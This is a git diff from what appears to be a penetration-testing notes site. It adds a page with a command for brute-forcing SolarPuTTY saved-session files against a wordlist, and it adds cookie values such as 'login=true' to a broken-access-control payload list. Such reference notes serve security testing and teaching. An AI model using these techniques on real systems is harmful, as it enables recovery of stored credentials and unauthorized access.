hdks-bug
diff --git a/‎src/exploit/network/tool/decrypt-putty-sessions-files.md
Lines changed: 17 additions & 0 deletions b/‎src/exploit/network/tool/decrypt-putty-sessions-files.md
Lines changed: 17 additions & 0 deletions
diff --git a/‎src/exploit/web/security-risk/broken-access-control.md
Lines changed: 4 additions & 1 deletion b/‎src/exploit/web/security-risk/broken-access-control.md
Lines changed: 4 additions & 1 deletion
@@ -0,0 +1,17 @@
+---
+title: Decrypt SolarPuTTY Sessions Files
+description:
+tags:
+    - Network
+refs:
+date: 2024-12-06
+draft: false
+---
+
+## Decrypt
+
+Python code is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5)
+
+```sh
+python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt
+```
@@ -4,7 +4,7 @@ description: The attacking methodology of broken access control in web applicati
 tags:
     - Web
 refs:
-date: 2024-03-17
+date: 2024-12-06
 draft: false
 ---
 
@@ -43,6 +43,9 @@ Cookie: admin=true
 Cookie: isAdmin=true
 Cookie: access=1
 Cookie: access=true
+Cookie: login=true
+Cookie: login=success
+
 # Insert another user value
 Cookie: session=<another_user_value>
 Cookie: access_token=<another_user_value>